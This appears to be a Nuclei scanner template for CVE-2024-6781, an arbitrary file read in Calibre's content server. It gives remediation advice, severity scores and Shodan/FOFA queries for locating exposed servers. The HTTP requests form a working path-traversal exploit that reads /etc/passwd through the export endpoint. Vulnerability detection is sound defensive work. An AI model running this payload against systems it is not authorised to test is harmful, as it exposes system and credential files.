id: CVE-2024-6781 info: name: Calibre <= 7.14.0 Arbitrary File Read author: DhiyaneshDK severity: high description: | Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0. impact: | Attackers can exploit the content server's export functionality to read arbitrary files from the system through path traversal. remediation: | Update Calibre to version 7.15.0 or later to address the arbitrary file read vulnerability. reference: - https://starlabs.sg/advisories/24/24-6781/ classification: cve-id: CVE-2024-6781 cwe-id: CWE-22 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 epss-score: 0.93721 epss-percentile: 0.99858 cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:* metadata: verified: true vendor: calibre-ebook product: calibre shodan-query: html:"Calibre" fofa-query: "Server: calibre" max-request: 2 tags: cve,cve2024,calibre,lfi,vuln http: - raw: - | GET /interface-data/books-init HTTP/1.1 Host: {{Hostname}} extractors: - type: json name: book_ids internal: true json: - '.search_result.book_ids[0]' - raw: - | POST /cdb/cmd/export HTTP/1.1 Host: {{Hostname}} Content-Type: application/json ["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""] matchers-condition: and matchers: - type: word part: content_type words: - "application/json" - type: regex part: body regex: - 'root:.*:0:0:' - '"result":' condition: and - type: status status: - 200 # digest: 4a0a00473045022100a339a3b7ba9cdf454a6abbbc88182ef682154907333ba7f457395acb37bc66bd0220097048ac3244f030d99a8af2ac9ae1d2d17c46b5597b55746683652dba7e1fa0:922c64590222798bb761d5b6d8e72950